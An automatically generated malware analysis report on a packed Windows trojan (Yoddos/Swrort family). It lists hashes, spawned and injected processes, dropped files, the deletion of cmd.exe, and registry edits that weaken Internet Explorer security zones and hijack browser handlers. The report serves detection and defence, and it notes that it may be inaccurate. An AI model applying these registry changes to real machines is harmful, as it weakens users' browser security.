Trojan.Win32.Yoddos.vqa (Kaspersky), Gen:Variant.Kazy.202598 (B) (Emsisoft), Gen:Variant.Kazy.202598 (AdAware), Trojan.Win32.Swrort.3.FD, GenericInjector.YR (Lavasoft MAS)Behaviour: Trojan
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 353f881950e6de185c9070fc4b158bd8
SHA1: dd0751b9015b331e55ae36e16921c337cd7e4d7c
SHA256: 74c23477507e1ff67580b3f27a3e06d040a3844db9955facda385be164a48ec9
SSDeep: 98304:eoqowFkRF8IsllQk9Z7hEydAkrpSfJ4O7NuLP:qiFC5JbIB307
Size: 3887109 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: PolyEnE001byLennartHedlund, UPolyXv05_v6
Company: Xacti, LLC
Created at: 2014-09-30 16:54:56
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
nvsvc32.exe:2544
hdptlk.exe:2556
ndis500.exe:2916
yYJSx.exe:1976
appmon.exe:3368
%original file name%.exe:228
MiniIE.exe:2752
ndsqp.exe:2956
tray.exe:3316
traytp.exe:452
ndislib.exe:3296
The Trojan injects its code into the following process(es):
Cattle.exe:3444
Explorer.EXE:1572
Mutexes
The following mutexes were created/opened:No objects were found.
File activity
The process nvsvc32.exe:2544 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\HpE\wow64\configWord.cf (676 bytes)
%WinDir%\HpE\wow64\rebuild.exe (8147 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0HUL6ZQ7\hotkey[1].txt (676 bytes)
%System%\cBLK.dll (2341 bytes)
%System%\clk.ini (186 bytes)
%WinDir%\HpE\wow64\DProEx.sys (1176 bytes)
%WinDir%\HpE\wow64\reTcp.sys (588 bytes)
%WinDir%\HpE\wow64\config.ini (98 bytes)
The Trojan deletes the following file(s):
%System%\cmd.exe (0 bytes)
The process ndis500.exe:2916 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\HpE\sys32\weblog.log (263 bytes)
%WinDir%\HpE\sys32\m0gtv9N (3809 bytes)
%WinDir%\HpE\sys32\xp28p2U.sys (22 bytes)
The Trojan deletes the following file(s):
%WinDir%\HpE\sys32\m0gtv9N (0 bytes)
%WinDir%\HpE\sys32\xp28p2U.sys (0 bytes)
The process yYJSx.exe:1976 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\evaqocv.txt (17 bytes)
%System%\tl.dat (13 bytes)
%System%\bc.dat (3808 bytes)
%System%\tl.txt (1444 bytes)
%WinDir%\HpE\First.txt (23220 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\yfodbgl.txt (2321 bytes)
%WinDir%\HpE\sys32\urlnav.txt (14076 bytes)
%System%\ndislib.exe (243 bytes)
%WinDir%\HpE\hdptlk.exe (139 bytes)
%WinDir%\HpE\sys32\tray.txt (221016 bytes)
%WinDir%\HpE\wow64\nvsvc32.exe (17629 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tcueuqo.txt (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\mwgxskf.txt (673 bytes)
%WinDir%\HpE\exec\traytp.exe (1794 bytes)
%WinDir%\HpE\wow64\nvsvc32.txt (448324 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\lfllrdu.txt (15278 bytes)
%WinDir%\HpE\MiniIE.txt (175005 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\przmycg.txt (673 bytes)
%System%\ndislib.txt (40972 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\sccppeu.txt (13122 bytes)
%System%\bc.txt (127812 bytes)
%WinDir%\HpE\MiniIE.exe (7386 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\uwvmjte.txt (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\mxezyyf.txt (7345 bytes)
%WinDir%\HpE\sys32\ndis500.exe (325 bytes)
%WinDir%\HpE\sys32\whitelist.dat (2 bytes)
%WinDir%\HpE\sys32\urlnav.dll (83 bytes)
%System%\appmon.exe (9606 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ihutphk.txt (1425 bytes)
%WinDir%\HpE\sys32\tray.exe (7972 bytes)
%WinDir%\HpE\sys32\whitelist.txt (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\rhkqvcb.txt (26096 bytes)
%WinDir%\HpE\sys32\ndis500.txt (55748 bytes)
%System%\lhc.txt (32148 bytes)
%WinDir%\HpE\sys32\ndsqp.exe (106 bytes)
%WinDir%\HpE\exec\traytp.txt (88420 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\oqgrsfe.txt (10177 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nagsjof.txt (601 bytes)
%WinDir%\HpE\flist.bin (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ipobzxt.txt (4545 bytes)
%System%\drivers\HideSys.sys (15 bytes)
%System%\appmon.txt (263811 bytes)
%System%\lhc.dat (185 bytes)
%WinDir%\HpE\sys32\ndsqp.txt (17980 bytes)
The process appmon.exe:3368 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Temp\AdbWinUsbApi.dll (60 bytes)
%WinDir%\Temp\adbWinpi.dll (304 bytes)
%WinDir%\Temp\Cattle.exe (3727 bytes)
%WinDir%\Temp\AdbWinApi.dll (96 bytes)
%WinDir%\Temp\TscServer.exe (1653 bytes)
The process %original file name%.exe:228 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\8LG56LOL\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\PYJT5JHI\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0HUL6ZQ7\desktop.ini (67 bytes)
%System%\LQdhJ\yYJSx.exe (414 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\P4IK7RMW\desktop.ini (67 bytes)
The process ndsqp.exe:2956 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\HpE\sys32\weblog.log (585 bytes)
%WinDir%\HpE\sys32\oK455Vp (13 bytes)
%WinDir%\HpE\sys32\z7AQ9Ew.sys (22 bytes)
The Trojan deletes the following file(s):
%WinDir%\HpE\sys32\oK455Vp (0 bytes)
%WinDir%\HpE\sys32\z7AQ9Ew.sys (0 bytes)
The process tray.exe:3316 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\HpE\sys32\services.exe (3904 bytes)
The process traytp.exe:452 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\HpE\exec\ico.ini (292 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\8LG56LOL\statbar[1].ini (152 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\traytp.lnk (640 bytes)
The process ndislib.exe:3296 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\v9pce8W (1629 bytes)
%System%\weblog.log (349 bytes)
%System%\gy17y1D.sys (22 bytes)
The Trojan deletes the following file(s):
%System%\v9pce8W (0 bytes)
%System%\gy17y1D.sys (0 bytes)
Registry activity
The process nvsvc32.exe:2544 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"WarnOnZoneCrossing" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1]
"1609" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCR\Microsoft.IE]
"(Default)" = "%WinDir%\HpE\wow64\rebuild.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\123]
"HomePage" = "0"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8E F9 A4 E8 40 EC 6D 61 0B 7E 1F AF 80 CE 12 74"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following registry key(s):
[HKLM\System\CurrentControlSet\Services\DProEx]
[HKLM\System\CurrentControlSet\Services\FixTool\Enum]
[HKLM\System\CurrentControlSet\Services\FixTool\Security]
[HKLM\System\CurrentControlSet\Services\DProEx\Enum]
[HKLM\System\CurrentControlSet\Services\FixTool]
[HKLM\System\CurrentControlSet\Services\DProEx\Security]
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process hdptlk.exe:2556 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCR\TypeLib\{40195CA5-4EA4-4B10-88B3-5659A0A5310B}\1.0\0\win32]
"(Default)" = "%WinDir%\HpE\sys32\urlnav.dll"
[HKCR\CLSID\{9A4DDA61-1D3A-49B7-9849-DAC6CD30A393}\ProgID]
"(Default)" = "Urlnav.Nav.1"
[HKCR\Urlnav.Nav]
"(Default)" = "Nav Class"
[HKCR\TypeLib\{40195CA5-4EA4-4B10-88B3-5659A0A5310B}\1.0]
"(Default)" = "urlnav 1.0 Type Library"
[HKCR\CLSID\{9A4DDA61-1D3A-49B7-9849-DAC6CD30A393}]
"(Default)" = "Nav Class"
[HKCU\Software\Microsoft\Internet Explorer\Main]
"Error Dlg Displayed On Every Error" = "no"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\BROWSE\SCRIPT_ERROR_CACHE]
"DefaultValue" = "yes"
[HKCR\Interface\{ED2676C8-F22C-4E60-9812-E2851B2AD210}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Urlnav.Nav.1]
"(Default)" = "Nav Class"
[HKCR\Interface\{ED2676C8-F22C-4E60-9812-E2851B2AD210}\TypeLib]
"Version" = "1.0"
[HKCR\Urlnav.Nav.1\CLSID]
"(Default)" = "{9A4DDA61-1D3A-49B7-9849-DAC6CD30A393}"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\BROWSE\SCRIPT_ERROR_CACHE]
"CheckedValue" = "yes"
[HKCR\Urlnav.Nav\CLSID]
"(Default)" = "{9A4DDA61-1D3A-49B7-9849-DAC6CD30A393}"
[HKCR\TypeLib\{40195CA5-4EA4-4B10-88B3-5659A0A5310B}\1.0\FLAGS]
"(Default)" = "0"
[HKCR\CLSID\{9A4DDA61-1D3A-49B7-9849-DAC6CD30A393}\InprocServer32]
"ThreadingModel" = "Apartment"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\BROWSE\SCRIPT_ERROR_CACHE]
"UncheckedValue" = "no"
[HKCU\Software\Microsoft\Internet Explorer\New Windows]
"PopupMgr" = "no"
[HKCR\CLSID\{9A4DDA61-1D3A-49B7-9849-DAC6CD30A393}\VersionIndependentProgID]
"(Default)" = "Urlnav.Nav"
[HKCR\Interface\{ED2676C8-F22C-4E60-9812-E2851B2AD210}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "39 25 ED 45 9E EA 26 3B 22 EC 5B F9 23 D4 A4 EC"
[HKCR\Interface\{ED2676C8-F22C-4E60-9812-E2851B2AD210}]
"(Default)" = "INav"
[HKCR\Interface\{ED2676C8-F22C-4E60-9812-E2851B2AD210}\TypeLib]
"(Default)" = "{40195CA5-4EA4-4B10-88B3-5659A0A5310B}"
[HKCR\CLSID\{9A4DDA61-1D3A-49B7-9849-DAC6CD30A393}\InprocServer32]
"(Default)" = "%WinDir%\HpE\sys32\urlnav.dll"
[HKCR\TypeLib\{40195CA5-4EA4-4B10-88B3-5659A0A5310B}\1.0\HELPDIR]
"(Default)" = "%WinDir%\HpE\sys32\"
The process Cattle.exe:3444 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AD 32 30 F8 40 1A 87 6C B9 71 22 D2 A7 1C 4B 3D"
The process ndis500.exe:2916 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C1 15 B6 36 09 56 56 81 4F 4C 6F EB 9D D1 BD 06"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The Trojan deletes the following registry key(s):
[HKLM\System\CurrentControlSet\Services\lf3qZKD\Enum]
[HKLM\System\CurrentControlSet\Services\lf3qZKD\Security]
[HKLM\System\CurrentControlSet\Services\lf3qZKD]
The process yYJSx.exe:1976 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3E 24 F8 5D 45 D7 83 69 E9 0E 49 A2 2F 38 B9 86"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
The process appmon.exe:3368 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F7 B9 63 7A E1 CE 31 05 6D D3 6D 47 51 32 E1 D1"
The process %original file name%.exe:228 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "00 1A 04 5F 39 2C 57 66 95 F8 4B 10 42 E7 97 B1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process MiniIE.exe:2752 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D8 0A 14 13 3E 46 6C 22 03 26 65 B4 F9 35 D6 04"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\BROWSE\SCRIPT_DEBUGGER_IE]
"DefaultValue" = "yes"
[HKCR\Microsoft.PubIE]
"(Default)" = "%WinDir%\HpE\MiniIE.exe"
[HKCU\Software\Microsoft\Internet Explorer\Main]
"DisableScriptDebuggerIE" = "yes"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\BROWSE\SCRIPT_DEBUGGER]
"CheckedValue" = "yes"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\BROWSE\SCRIPT_DEBUGGER_IE]
"CheckedValue" = "yes"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_SCRIPTURL_MITIGATION]
"MiniIE.exe" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]
"1601" = "0"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\BROWSE\SCRIPT_DEBUGGER]
"UncheckedValue" = "no"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\BROWSE\SCRIPT_DEBUGGER_IE]
"UncheckedValue" = "no"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MaxConnectionsPerServer" = "10"
"MaxConnectionsPer1_0Server" = "10"
[HKCU\Software\Microsoft\Internet Explorer\Main]
"Disable Script Debugger" = "yes"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\BROWSE\SCRIPT_DEBUGGER]
"DefaultValue" = "yes"
The process ndsqp.exe:2956 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AC 05 C7 C8 F2 40 05 76 5F 84 40 05 CD 63 B2 3B"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The Trojan deletes the following registry key(s):
[HKLM\System\CurrentControlSet\Services\n1P2bmf\Security]
[HKLM\System\CurrentControlSet\Services\n1P2bmf]
[HKLM\System\CurrentControlSet\Services\n1P2bmf\Enum]
The process tray.exe:3316 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D3 1D E8 4C A5 82 0E 16 7C 1A D1 51 96 20 02 BC"
The process traytp.exe:452 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
"Common Documents" = "%Documents and Settings%\All Users\Documents"
